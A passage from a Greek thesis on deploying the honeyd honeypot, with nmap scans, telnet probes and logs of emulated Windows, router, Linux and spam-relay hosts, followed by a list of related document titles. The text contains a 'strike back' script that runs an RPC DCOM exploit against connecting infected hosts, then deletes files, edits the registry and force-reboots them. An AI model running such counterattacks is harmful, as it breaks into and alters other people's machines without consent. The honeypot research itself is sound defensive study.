λειτουργούν και να δούμε τον τρόπο με τον οποίο καταγράφουν τις συνδέσεις. Δοκιμή του windows virtual host Ο σκοπός της δημιουργίας αυτού του virtual host είναι να προσομοιωθεί ένα τυπικό windows xp σύστημα ώστε να μελετηθεί η φύση και ο αριθμός των επιθέσεων που δέχεται. Για το λόγω αυτό είναι ανοικτές οι κύριες πόρτες που χρησιμοποιούν τα windows και δεν φιλτράρονται, ενώ τρέχουν και κάποιες υπηρεσίες. Το πείραμα έδειξε ότι είχαμε δίκιο να δώσουμε σχεδόν ολόκληρο το C-class δίκτυο μας στη δημιουργία windows virtual hosts, καθώς η πλειοψηφία των επιθέσεων και όλα τα worms
16 στοχεύουν σε windows συστήματα. Κοιτάζουμε αν ο είναι up ping PING ( ) 56(84) bytes of data. 64 bytes from : icmp_seq=1 ttl=128 time=1996 ms 64 bytes from : icmp_seq=2 ttl=128 time=981 ms 64 bytes from : icmp_seq=3 ttl=128 time=0.687 ms 64 bytes from : icmp_seq=4 ttl=128 time=0.618 ms ping statistics -- 4 packets transmitted, 4 received, 0% packet loss, time 3025ms rtt min/avg/max/mdev = 0.618/ / / ms, pipe 2 Κάνουμε ένα port scanning: markos@pluto$ sudo nmap -ss -v -v -O -p Starting nmap V ( ) Host ( ) appears to be up... good. Initiating SYN Stealth Scan against ( ) Adding open port 143/tcp Adding open port 20168/tcp Adding open port 9996/tcp Adding open port 10080/tcp Adding open port 3117/tcp Adding open port 80/tcp Adding open port 3128/tcp Adding open port 21/tcp Adding open port 4444/tcp Adding open port 25/tcp Adding open port 137/tcp Adding open port 138/tcp Adding open port 139/tcp Adding open port 5554/tcp Adding open port 1080/tcp Adding open port 22/tcp Adding open port 3127/tcp Adding open port 8967/tcp The SYN Stealth Scan took 88 seconds to scan ports. For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
17 Interesting ports on ( ): (The ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 135/tcp open unknown 143/tcp open imap2 1080/tcp open socks 3117/tcp open unknown 3127/tcp open unknown 3128/tcp open squid-http 4444/tcp open krb /tcp open unknown 8967/tcp open unknown 9996/tcp open unknown 10080/tcp open unknown 20168/tcp open unknown Running: Windows XP Professional SP1 Nmap run completed 1 IP address (1 host up) scanned in 96 seconds Το nmap βρίσκει όλες τις υπηρεσίες και το λειτουργικό σύστημα όπως τα έχουμε ρυθμίσει! markos@pluto$ telnet Trying Connected to Escape character is ^]. HEADERS / HTTP/ windows HTTP/ Access Forbidden Server: Microsoft-IIS/5.0 Date: Wed, 12 Jan :07:56 GMT Content-Type: text/html Content-Length: 44 <body><h2>http/ Forbidden</h2></body>Connection closed by foreign host. Στην κονσόλα που παρατηρούμε το honeyd εμφανίζονται τα εξής: honeyd[387]: Connection request: tcp ( : :80) honeyd[387]: Connection established: tcp ( : :80) <-> scripts/win2k/iisemulator-0.95/iisemul8.pl
18 Στις πόρτες 1080, 3127, 3128, προσομοιώνεται το backdoor που εγκαθιστά το worm mydoom. Ένας μολυσμένος host από τον mydoom μόλις καταλάβει ότι κάποια από τις παραπάνω πόρτες είναι ανοικτές θα επιχειρήσει να συνδεθεί. Στις πόρτες 5554, 9996, 8967, 20168, 3117 ακούει ένα cmd prompt του λειτουργικού που προσομοιώνουμε (windows xp).διάφοροι ιοι μεταξύ των οποίων οι sasser, msblast και άλλοι εγκαθιστούν σαν backdoor ένα cmd shell σε αυτές τις πόρτες και επομένως ένας μολυσμένος host θα νομίσει ότι ο virtual host μας είναι κι αυτός μολυσμένος. To 4444.sh είναι ένα script γραμμένο για την αντιμετώπιση του worm msblast που εκμεταλλεύεται το rpc dcom exploit [2,3].Το καλοκαίρι του 2003 όπου και δημιουργήθηκε ο msblast, μέσα σε λίγο χρόνο κατάφερε να μολύνει εκατομμύρια υπολογιστές που έτρεχαν Microsoft Windows. Και όπως διαπιστώσαμε από το πείραμα, το worm αυτό, ύστερα από 2 χρόνια, δεν κυκλοφορεί στο internet. Anti msblast script Οι πόρτες που χρησιμοποιούν τα windows για file sharing και netbios οφείλονται για τις περισσότερες μολύνσεις και μεταδώσεις ιων. Τα διάφορα worms κάνουν scan για να διαπιστώσουν αν οι πόρτες αυτές είναι ανοικτές, οπότε και θα προσπαθήσουν να μεταδώσουν τον ιο. Με το να αφήνουμε ανοικτή μια πόρτα, χωρίς να τρέχει απαραίτητα κάποια υπηρεσία, μπορούμε με τη βοήθεια κάποιου ids ή ακόμα και ενός sniffer που καταγράφει την κίνηση, να πιάσουμε το payload ενός ιου ή exploit που επιχειρείται στην υπηρεσία η οποία φυσιολογικά τρέχει πίσω από αυτή την πόρτα. Το worm msblast αφου δει ότι η πόρτα 135 είναι ανοικτή θα επιχειρήσει να συνδεθεί με την πόρτα 4444, υποθέτωντας ότι αν ο host είναι ήδη μολυσμένος θα έχει εγκατασταθεί σε αυτή την πόρτα το backdoor. Διαφορετικά στέλνει το payload του ιου στην 135 και κατοπιν προσπαθεί να συνδεθεί με την 4444 για να διαπιστώσει αν πέτυχε το exploit. Το script που το honeyd θα τρέχει για κάθε εισερχόμενη σύνδεση στην πόρτα 4444 είναι το εξής: scripts/4444.sh # launch the exploit against the internal attacker /usr/honeyd/honeyd-1.0/scripts/dcom -d $1 -t 1 -l 4445 << EOF taskkill /f /im msblast.exe /t del /f %SystemRoot%\System32\msblast.exe echo Windows Registry Editor Version 5.00 > c:\cleanermsblast.reg
19 echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\cleanermsblast.reg echo windows auto update = REM msblast.exe >> c:\cleanermsblast.reg regedit /s c:\cleanermsblast.reg del /f c:\cleanermsblast.reg shutdown -r -f -t 0 exit EOF Το scripts/dcom είναι το exploit για το RPC DCOM. Εκμεταλλεύεται την αδυναμία αυτή στα λειτουργικά συστήματα windows 2000 και xp και μετά από επιτυχημένη εκτέλεση συνήθως ανοίγει ένα command prompt με δικαιώματα system. Στην περίπτωση που ένας μολυσμένος από το worm host επιχειρήσει σύνδεση στην 4444 στον windoze host, αυτός εκτελεί το dcom exploit και επιχειρεί να αποκτήσει πρόσβαση στο host αυτό! Αν τα καταφέρει, τερματίζει τη διεργασία του msblast, σβήνει τον ιο από το σύστημα,καθαρίζει τη registry και κάνει reboot στον υπολογιστή. Το script μπορεί να βελτιωθεί ώστε να κατεβάζει το patch για τον ιο αυτό ώστε να μην μπορεί να μολυνθεί στο μέλλον [3]. Ο ιος msblast είναι πολύ εύκολο να σβηστεί από έναν μολυσμένο υπολογιστή, καθώς αποτελείται από ένα μόνο αρχείο εκτελέσιμο και τις εγγραφές στη registry. Δυστυχώς οι πιο πρόσφατοι ιοί μολύνουν το σύστημα σε αρκετά σημεία και επίσης κυκλοφορούν σε αρκετές παραλλαγές ώστε να είναι πολύ πιο δύσκολη η αντιμετώπιση τους με έναν αυτοματοποιημένο τρόπο strike back σαν αυτόν που περιγράφεται. Δοκιμή του router Ο σκοπός της δημιουργίας αυτού του virtual host είναι να προσομοιωθεί ένας router ώστε το δίκτυο μας να είναι περισσότερο αληθοφανές. Η λειτουργία των routers είναι πολύ σημαντική για ένα δίκτυο, καθώς αναλαμβάνουν την προώθηση των πακέτων. Συχνά δεν δίνεται μεγάλη σημασία στην ασφάλεια τους, γεγονός που προκαλεί πολλά προβλήματα. Μέχρι στιγμής δεν έχει υπάρξει κάποιο worm που να απευθύνεται σε routers. Ωστόσο αυτό δεν είναι καθόλου ευσηχαστικό, τη στιγμή μάλιστα που κυκλοφορούν αρκετά γνωστά προβλήματα για τους routers των μεγαλύτερων εταιρειών -πχ cisco-και μια συντονισμένη επίθεση που θα στόχευε τους δρομολογητές θα προκαλούσε πολύ μεγάλη ζημιά, αφού πρόκειται για την ίδια την υποδομή του internet. Κοιτάζουμε αν ο είναι up:
20 ping PING ( ) 56(84) bytes of data. 64 bytes from : icmp_seq=1 ttl=64 time=0.755 ms 64 bytes from : icmp_seq=2 ttl=64 time=0.600 ms ping statistics --2 packets transmitted, 2 received, 0% packet loss, time 999ms rtt min/avg/max/mdev = 0.600/0.677/0.755/0.081 ms Αντίστοιχα το honeyd μας ενημερώνει για το ping honeyd[264]: Sending ICMP Echo Reply: > Δοκιμάζουμε ένα port scanning: markos@pluto$ sudo nmap -ss -v -v -O Starting nmap V ( ) Host ( ) appears to be up... good. Initiating SYN Stealth Scan against ( ) Adding open port 22/tcp Adding open port 23/tcp The SYN Stealth Scan took 2 seconds to scan 1601 ports. For OSScan assuming that port 22 is open and port 1 is closed and neither are firewalled Interesting ports on ( ): (The 1599 ports scanned but not shown below are in state: closed) Port State Service 22/tcp open ssh 23/tcp open telnet Remote operating system guess: Cisco IOS (11) OS Fingerprint: Tseq(Class=TD%gcd=1%SI=18%IPID=I%TS=U) T1(Resp=Y%DF=N%W=1020%ACK=S++%Flags=AS%Ops=M) T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) T3(Resp=Y%DF=N%W=1020%ACK=S++%Flags=AS%Ops=M) T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=) PU(Resp=Y%DF=N%TOS=C0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN =134%DAT=E) TCP Sequence Prediction: Class=trivial time dependency Difficulty=24 (Easy) TCP ISN Seq. Numbers: D16BFEBC D16BFEDD D16BFF0F D16BFF52 D16BFFA6 D16BFFB6 IPID Sequence Generation: Incremental Nmap run completed 1 IP address (1 host up) scanned in 3 seconds
21 To nmap βρίσκει ότι το virtual host μας τρέχει 2 υπηρεσίες (ssh και telnet), ενώ ανιχνεύει σωστά το λειτουργικό του σύστημα! markos@pluto$ telnet Trying Connected to Escape character is ^]. SSH qwerty qwerty dfgdfgdfg dfgdfgdfg Απο την πλευρά του honeyd: honeyd[299]: Connection request: tcp ( : :22) honeyd[299]: Connection established: tcp ( : :22) <-> scripts/test.sh honeyd[299]: Connection closed: tcp ( : :22 Το scripts/test.sh είναι ένα πολύ βασικό script, το οποίο εμφανίζει ένα ssh banner και μετά κάνει echo ό,τι γράφεται. Δοκιμή του linux Ο σκοπός της δημιουργίας αυτού του virtual host είναι να προσομοιωθεί ένας τυπικός linux server ώστε να μελετηθεί η φύση και ο αριθμός των επιθέσεων που δέχεται. Κοιτάζουμε αν ο είναι up: markos@pluto$ ping PING ( ) 56(84) bytes of data. 64 bytes from : icmp_seq=1 ttl=255 time=1.00 ms 64 bytes from : icmp_seq=2 ttl=255 time=0.620 ms ping statistics --2 packets transmitted, 2 received, 0% packet loss, time 1004ms rtt min/avg/max/mdev = 0.620/0.813/1.006/0.193 ms
22 Δοκιμάζουμε ένα port scanning: sudo nmap -ss -v -v -O Starting nmap V ( ) ( ) appears to be up... good. Initiating SYN Stealth Scan against ( ) Adding open port 21/tcp Adding open port 22/tcp Adding open port 25/tcp Adding open port 80/tcp Adding open port 110/tcp Adding open port 143/tcp Adding open port 514/udp Adding open port 8080/tcp The SYN Stealth Scan took 2 seconds to scan 1601 ports. For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled Interesting ports on ( ): (The 1597 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 110/tcp open pop3 143/tcp open imap 514/udp open syslogd 8080/tcp open squid No exact OS matches for host (If you know what OS is running on it, see TCP/IP fingerprint: Sinfo(V=3.00%P=i386-redhat-linux-gnu%D=1/12%Time=41E4FE1B%O=21%C=1) Tseq(Class=RI%gcd=1%SI=6C72A6%IPID=Z%TS=100HZ) T1(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW) T2(Resp=N) T3(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW) T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=) T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) PU(Resp=Y%DF=N%TOS=D0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULE N=134%DAT=E) Uptime days (since Wed Jan 12 12:24: ) TCP Sequence Prediction: Class=random positive increments Difficulty= (Good luck!) TCP ISN Seq. Numbers: 4ACCA8C0 4BFF655F 4D7ED126 4DCB804D 4E64DE9C 4F4AEC13 IPID Sequence Generation: All zeros Nmap run completed 1 IP address (1 host up) scanned in 19 seconds
23 Το nmap βρίσκει τις υπηρεσίες που τρέχει ο virtual host καιτο λειτουργικό σύστημα. telnet Trying Connected to Escape character is ^]. headers / http/1.0 <!DOCTYPE HTML PUBLIC -//IETF//DTD HTML 2.0//EN > <HTML><HEAD> <TITLE>501 Method Not Implemented</TITLE> </HEAD><BODY> <H1>Method Not Implemented</H1> to /index.php not supported.<p> <P>alid method in request headers / http/1.0 <HR> <ADDRESS>Apache/ Server at edunet-cas7.edu Port </ADDRESS> </BODY></HTML> Connection closed by foreign host. Το script apache.sh δημιουργεί έναν fake web server που σκοπό έχει να ξεγελάσει τους επιτιθέμενους και να νομίσουν ότι έχουν να κάνουν με τον apache, και συγκεκριμένα με την έκδοση , όπως βλέπουμε παραπάνω από την απόκριση. Η αρχική σελίδα είναι η σελίδα της default εγκατάστασης του apache σε ένα suse linux σύστημα. Η σύνδεση καταγράφεται στο messages honeyd[470]:connection request: tcp (xxx.xxx.xxx.xxx: :80) honeyd[470]:connection established: tcp (xxx.xxx.xxx.xxx: :80) <-> sh scripts/suse8.0/apache.sh και στο messages-base: --MARK--,"Wed Feb 16 13:04:01 EET 2005","apache/HTTP","xxx.xxx.xxx.xxx"," ",48277,80, "HEAD / HTTP/1.0 Στις πόρτες 21 -proftpd-, 22 -ssh-, 110 -qpop-, 143 -cyrus-imapd-,514 -syslogd-, squid proxy-τρέχουν μερικές από τις πιο χρησιμοποιούμενες υπηρεσίες, οι οποίες καταγράφουν τις συνδέσεις στο αρχείο /usr/honeyd/log/ messages-base. Δοκιμή του relay virtual host
24 Ο relay virtual host δημιουργείται αποκλειστικά σαν μια antispam παγίδα. Έχει ρυθμισμένες τις υπηρεσίες smtp.pl και proxy.pl Το πρώτο είναι προσομοίωση open mail relay και το δεύτερο open proxy. Σκοπός των υπηρεσιών αυτών είναι να καταγράψουν όλο το mail το οποίο δέχονται (το οποίο φυσικά είναι spam) ώστε να μην φτάσει αυτό στον προορισμό του αλλά και για αναλύσουμε γιατί και πώς λειτουργούν οι spammers. create relay set relay personality Sun Solaris 9 set relay default tcp action reset set relay default udp action reset add relay tcp port 25 scripts/smtp.pl -q add relay tcp port 8080 scripts/proxy.pl To spam που έρχεται αποθηκεύεται στο /usr/honeyd/log/spam
25 ΣΗΜΕΙΩΣΕΙΣ -ΠΑΡΑΠΟΜΠΕΣ [1] Buffer Overflow in iis indexing service dll, [2] Security advisory για τον msblast, [3] VBS script που καθαρίζει τον MSBlast και κατεβάζει και εγκαθιστά το patch, [4] A virtual Honeypot Framework, Niels Provos, Usenix security 2004 [5] Honeyd manual [6] Simulating networks with honeyd, Chandran, Pakala [7] Usage of Honeypots for Detection and Analysis of Unknown Security Attacks, Diploma thesis, Patrick Diebold
ΚΕΦΑΛΑΙΟ 2 ΤΟ HONEYD. Εισαγωγή
ΚΕΦΑΛΑΙΟ 2 ΤΟ HONEYD Εισαγωγή Τα τελευταία χρόνια ο όγκος της κακόβουλης διαδικτυακής κίνησης έχει αυξηθεί εντυπωσιακά, λόγω της συνεχούς εξάπλωσης των worms, τη δραστηριότητα των script kiddies που χρησιμοποιούν
ΚΕΦΑΛΑΙΟ 7 ΠΟΛΕΜΩΝΤΑΣ ΤΟ SPAM
ΚΕΦΑΛΑΙΟ 7 ΠΟΛΕΜΩΝΤΑΣ ΤΟ SPAM Λίγα λόγια για το spam Αμέτρητος είναι ο όγκος του spam email που καθημερινά γεμίζει τα mailboxes των χρηστών του internet. Το spam email είναι ίσως η μεγαλύτερη ενόχληση
NMAP. Tutorial and Examples. Γιώργος Καππές
NMAP Tutorial and Examples Γιώργος Καππές 2 NMAP TUTORIAL Το nmap είναι ένα δικτυακό εργαλείο ανάλυσης δικτύων. Σχεδιάστηκε έτσι ώστε να ελέγχει μεγάλα δίκτυα, ωστόσο λειτουργεί τέλεια και για έναν host.
δημιουργία ενός script για την αντιμετώπιση του sasser
ΚΕΦΑΛΑΙΟ 6 ΔΗΜΙΟΥΡΓΙΑ ΕΝΟΣ SCRIPT ΓΙΑ ΤΗΝ ΑΝΤΙΜΕΤΩΠΙΣΗ ΤΟΥ SASSER Εισαγωγή Από το 1988 και το worm που έφτιαξε ο ερευνητής Robert Morris για να δει αν η εξάπλωση ενός ιου είναι εφικτή, κανείς δεν μπορούσε
Κεφάλαιο 4 αποτελέσματα του πειράματος
ΚΕΦΑΛΑΙΟ 4 ΑΠΟΤΕΛΕΣΜΑΤΑ ΤΟΥ ΠΕΙΡΑΜΑΤΟΣ Εισαγωγή Το honeyd τέθηκε σε λειτουργία στις 24 Ιανουαρίου 2005 και σταμάτησε στις 9 Μαρτίου. Όλο αυτό το διάστημα έτρεχε συνέχεια, με εξαίρεση κάποιες ώρες που αφιερώθηκαν
Δίκτυα Υπολογιστών ΙΙ (Ασκήσεις Πράξης)
TEI Σερρών Τμήμα Πληροφορικής και Επικοινωνιών Δίκτυα Υπολογιστών ΙΙ (Ασκήσεις Πράξης) Ανάλυση Πρωτοκόλλων Τομέας Τηλεπικοινωνιών και Δικτύων Δρ. Αναστάσιος Πολίτης Καθηγητής Εφαρμογών anpol@teiser.gr
Απομακρυσμένη Πρόσβαση και Εντολές Ελέγχου και Υποστήριξης
Εργαστήριο 10 ΤΕΙ ΘΕΣΣΑΛΟΝΙΚΗΣ - ΤΜΗΜΑ ΠΛΗΡΟΦΟΡΙΚΗΣ ΜΑΘΗΜΑ: ΔΙΚΤΥΑ Η/Υ Απομακρυσμένη Πρόσβαση και Εντολές Ελέγχου και Υποστήριξης Στόχος Ο στόχος του παρόντος εργαστηρίου είναι διττός: από τη μία πλευρά
Κεφάλαιο 2. Πηγές δεδομένων του Honeynet
Πηγές δεδομένων του Honeynet - Σελίδα 16 - Πηγές Δεδομένων του Honeynet Οι πηγές δεδομένων, είναι εξαρτήματα του μηχανισμού Data Capture που μας παρέχουν στοιχεία για κάθε γεγονός που διαδραματίζεται μέσα
Web and HTTP. Βασικά Συστατικά: Web Server Web Browser HTTP Protocol
HTTP Protocol Web and HTTP Βασικά Συστατικά: Web Server Web Browser HTTP Protocol Web Servers (1/2) Ένα πρόγραμμα (λογισμικό) που έχει εγκατασταθεί σε ένα υπολογιστικό σύστημα (έναν ή περισσότερους υπολογιστές)
Εργαστήριο Δικτύων Υπολογιστών
Εργαστήριο Δικτύων Υπολογιστών 2 η Διάλεξη: TCP/UDP Δικτυακά πρωτόκολλα / εφαρμογές Ports Unix δικτυακές εντολές Transmission Control Protocol - TCP Πρωτόκολλο Mεταφοράς RFC 793 [Postel 1981] Xρησιμοποιεί
ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS
Τμήμα Πληροφορικής και Επικοινωνιών Α.Τ.Ε.Ι. Σερρών Σέρρες Μάρτιος 2006 ΜΕΛΕΤΗ ΕΠΙΣΦΑΛΩΝ ΣΗΜΕΙΩΝ ΚΑΙ ΒΕΛΤΙΩΣΗ ΤΗΣ ΑΣΦΑΛΕΙΑΣ ΣΕ INTERNET HOSTS Βροχίδης Ηλίας ΠΤΥΧΙΑΚΗ ΕΡΓΑΣΙΑ Επιβλέπων Καθηγητής: Χουβαρδάς
Στρατηγικές Ασφάλειας
Στρατηγικές Ασφάλειας Ασφάλεια Πληροφοριακών Συστημάτων. Διδάσκων: Σ. Κοντογιάννης Least/(Most) Privileges Defense in Depth Συγκεντρωτική Στρατηγική Weakest Link Strategy Fail Safe Stance Fail Safe Stance
Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες)
Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες) 2015 Εντολή: ping Απλή και βασική εντολή ελέγχου σύνδεσης με καποια IP διευθυνση (πχ. υπολογιστή) ping Στέλνει επαναλαμβανόμενα μηνύματα στην IP
Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες)
Διαχείριση Δικτύων Εργαστήριο (Διαφάνειες) 2016 Εντολή: ping Απλή και βασική εντολή ελέγχου σύνδεσης με κάποια IP διεύθυνση (πχ. υπολογιστή) ping Στέλνει επαναλαμβανόμενα μηνύματα στην IP
Ασφάλεια Υπολογιστικών Συστημάτων
Ασφάλεια Υπολογιστικών Συστημάτων Ενότητα 5: Ασφάλεια Δικτύων Νικολάου Σπύρος Τμήμα Μηχανικών Πληροφορικής ΤΕ Άδειες Χρήσης Το παρόν εκπαιδευτικό υλικό υπόκειται σε άδειες χρήσης Creative Commons. Για
Εξοικείωση με τις εντολές ipconfig και ping
Διαχείριση Δικτύων Τμήμα Μηχανικών Πληροφορικής ΤΕ ΤΕΙ Ηπείρου Εργαστηριακή Άσκηση Εξοικείωση με τις εντολές ipconfig και ping Σημείωση : Η άσκηση αναφέρεται σε εντολές των Windows. Υπάρχουν παρόμοιες
SSH. Tutorial. Γιώργος Καππές
SSH Tutorial Γιώργος Καππές SSH Tutorial Το ssh (Secure Shell) είναι ένα ασφαλές δικτυακό πρωτόκολλο το οποίο επιτρέπει τη μεταφορά δεδομένων μεταξύ δύο υπολογιστών. Το ssh όχι μόνο κρυπτογραφεί τα δεδομένα
Επίπεδο Μεταφοράς. (ανεβαίνουμε προς τα πάνω) Εργαστήριο Δικτύων Υπολογιστών Τμήμα Μηχανικών Η/Υ και Πληροφορικής
Επίπεδο Μεταφοράς (ανεβαίνουμε προς τα πάνω) Εργαστήριο Δικτύων Υπολογιστών 2014-2015 Τμήμα Μηχανικών Η/Υ και Πληροφορικής Επίπεδο Μεταφοράς(Transport layer) Επίπεδο εφαρμογής (Application layer): Συντονισμός
Εργαστήριο ικτύων Υπολογιστών 6η ιάλεξη: Ασφάλεια δικτύων
Εργαστήριο ικτύων Υπολογιστών 6 η ιάλεξη: Ασφάλεια δικτύων Ασφάλεια ικτύων Μέθοδοι επίθεσης Denial-of-Service i (DoS) Μη εξουσιοδοτημένη πρόσβαση (Unauthorized access attacks) Password attacks, Trojan
CYTA Cloud Server Set Up Instructions
CYTA Cloud Server Set Up Instructions ΕΛΛΗΝΙΚΑ ENGLISH Initial Set-up Cloud Server To proceed with the initial setup of your Cloud Server first login to the Cyta CloudMarketPlace on https://cloudmarketplace.cyta.com.cy
Μελέτη Χαμηλής και Υψηλής Αλληλεπίδρασης Honeypots
ΠΑΝΕΠΙΣΤΗΜΙΟ ΠΕΙΡΑΙΩΣ Τμήμα Διδακτικής της Τεχνολογίας και Ψηφιακών Συστημάτων Μελέτη Χαμηλής και Υψηλής Αλληλεπίδρασης Honeypots Πτυχιακή Εργασία Συγγραφέας: Τρούλης Σ. Ιωάννης Υπεύθυνος Καθηγητής: Δρ.
Επίπεδο δικτύου IP Forwading κτλ
Επίπεδο δικτύου IP Forwading κτλ (IP για που το έβαλες) Εργαστήριο Δικτύων Υπολογιστών 2014-2015 Τμήμα Μηχανικών Η/Υ και Πληροφορικής Επίπεδο δικτύου (Network layer) Επίπεδο εφαρμογής (Application layer):
Πρωτόκολλο ICMP (Internet Control Message Protocol)
Εργαστήριο Δικτύων Ι Εργαστηριακές Σημειώσεις Τεχνικός Δικτύων & Τηλεπικοινωνιών Ρίγγας Δηµήτρης Δ.Ι.Ε.Κ. Κέρκυρας, 2014 Πρωτόκολλο ICMP (Internet Control Message Protocol) Τι είναι το ICMP Το πρωτόκολλο
Σύντομη παρουσίαση των εργαλείων/εντολών telnet, ping, traceroute nslookup και nmap, zenmap
Σύντομη παρουσίαση των εργαλείων/εντολών telnet, ping, traceroute nslookup και nmap, zenmap Version 2.00 Επιμέλεια Σημειώσεων: Δημήτρης Κόγιας Πατρικάκης Χαράλαμπος Πίνακας περιεχομένων TELNET... 2 PING...
Ασφάλεια Υπολογιστών Και Δικτύων. Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή
Ασφάλεια Υπολογιστών Και Δικτύων Προσομοίωση επίθεσης σε ευπαθές σε SQL Injection σύστημα και απόκτηση κονσόλας διαχειριστή Ονοματεπώνυμο: Κυριακού Ανδρόνικος Αριθμός Μητρώου: 5806 Email: kyriakou@ceid.upatras.gr
Μόλις επανεκκινηθεί το inetd, η υπηρεσία θα απενεργοποιηθεί. Μπορείτε να απενεργοποιήσετε το inetd με την εντολή:
Κεφάλαιο 14 Ασφάλεια Η ασφάλεια κάθε συστήματος είναι σημαντική. Μπορεί να αποτρέψει τους άλλους απο το να χρησιμοποιήσουν τον υπολογιστή σας για να κάνουν μια επίθεση, καθώς επίσης και να προστατέψει
ΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη
ΗY335: Δίκτυα Υπολογιστών Χειμερινό Εξάμηνο 2012-2013 Τμήμα Επιστήμης Υπολογιστών Πανεπιστήμιο Κρήτης Διδάσκουσα: Μαρία Παπαδοπούλη Project 2012-2013 Υλοποίηση ενός chat server-client Παράδοση: 7/2/2013
ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης
ΤΕΙ ΗΠΕΙΡΟΥ Τμήμα Τηλεπληροφορικής & Διοίκησης ΕΓΚΑΤΑΣΤΑΣΗ & ΠΑΡΑΜΕΤΡΟΠΟΙΗΣΗ INTERNET INFORMATION SERVER (IIS) ΓΙΑ ΥΛΟΠΟΙΗΣΗ ΥΠΗΡΕΣΙΩΝ ΔΙΑΔΙΚΤΥΟΥ (WEB SERVICES) ΣΠΟΥΔΑΣΤΡΙΑ:Μπάρδα Μαρία ΕΙΣΗΓΗΤΗΣ: Τσιαντής
Network Address Translation (NAT)
HY335Α Δίκτυα Υπολογιστών Xειμερινό Εξάμηνο 2016-2017 Πανεπιστήμιο Κρήτης, Τμήμα Επιστήμης Υπολογιστών Network Address Translation (NAT) Network Layer Private IP Addresses Πρόβλημα: o χώρος των ΙΡ διευθύνσεων
Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι
Αρχιτεκτονικές Δικτύων & Πρωτόκολλα Ι Ενότητα : Δίκτυα υπολογιστών - Βασικά εργαλεία δικτύων στο Linux. Όνομα Καθηγητή : Δημήτριος Λυμπερόπουλος, Σπύρος Δενάζης Τμήμα : Ηλεκτρολόγων Μηχανικών και Τεχνολογίας
Δίκτυα Η/Υ στην Επιχείρηση
Δίκτυα Η/Υ στην Επιχείρηση Δικτυακά πρωτόκολλα και εφαρμογές, Δρομολόγηση Γκάμας Βασίλειος, Εργαστηριακός Συνεργάτης Μοντέλο πελάτη-εξυπηρετητή Προκειμένου να χρησιμοποιήσουμε μια υπηρεσία του Internet
ΛΕΙΤΟΥΡΓΙΚΑ ΣΥΣΤΗΜΑΤΑ. Εργαστήριο Εγκατάσταση Ubuntu με VirtualBox Εγκατάσταση Ubuntu με Unetbootin Απομακρυσμένη πρόσβαση με Putty/WinSCP
ΛΕΙΤΟΥΡΓΙΚΑ ΣΥΣΤΗΜΑΤΑ Εργαστήριο Εγκατάσταση Ubuntu με VirtualBox Εγκατάσταση Ubuntu με Unetbootin Απομακρυσμένη πρόσβαση με Putty/WinSCP Κ.Γ. Μαργαρίτης, Τμήμα Εφαρμοσμένης Πληροφορικής, Πανεπιστήμιο
Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Ρύθμιση Postfix SMTP Server, Courier IMAP, POP3 σε Ubuntu Linux
Υλοποίηση Δικτυακών Υποδομών και Υπηρεσιών: Ρύθμιση Postfix SMTP Server, Courier IMAP, POP3 σε Ubuntu Linux Πανεπιστήμιο Πελοποννήσου Τμήμα Επιστήμης & Τεχνολογίας Τηλεπικοινωνιών Ευάγγελος Α. Κοσμάτος
Ελίνα Μακρή
Ελίνα Μακρή elmak@unipi.gr Απαγορεύεται η χρήση οποιουδήποτε εργαλείου ασφάλειας σε μη προστατευμένο περιβάλλον. Εύκολος εντοπισμός των IP διευθύνσεων μέσω των ISP Providers. Πρόκληση σοβαρών βλαβών στο
MUM ATHENS, GREECE 2015
Presentation: Basic & Advanced RouterOS Setups (ΒΑΣΙΚΕΣ & ΠΡΟΧΩΡΗΜΕΝΕΣ ΕΓΚΑΤΑΣΤΑΣΕΙΣ ΜΕ ROUTEROS) Project Manager IonianWiFi Internet Services www.ionianwifi.gr ΠΡΩΤΗ ΕΠΑΦΗ Χρήση του Mikrotik RB951Ui-
ΤΕΧΝΙΚΕΣ ΕΠΙΘΕΣΗΣ (1/8)
ΑΣΦΑΛΕΙΑ WEB CLIENT ΤΕΧΝΙΚΕΣ ΕΠΙΘΕΣΗΣ (1/8) Επίθεση άρνησης υπηρεσίας (Denial of Service-DoS). Αποστολή πολλών αιτήσεων στο µηχάνηµα-στόχο ώστε τα resources που του αποµένουν (σε αυτόν ή και στο δίκτυο).
Κεφάλαιο 7 Διαδικτύωση-Internet. 7.2 Τεχνολογία TCP/IP
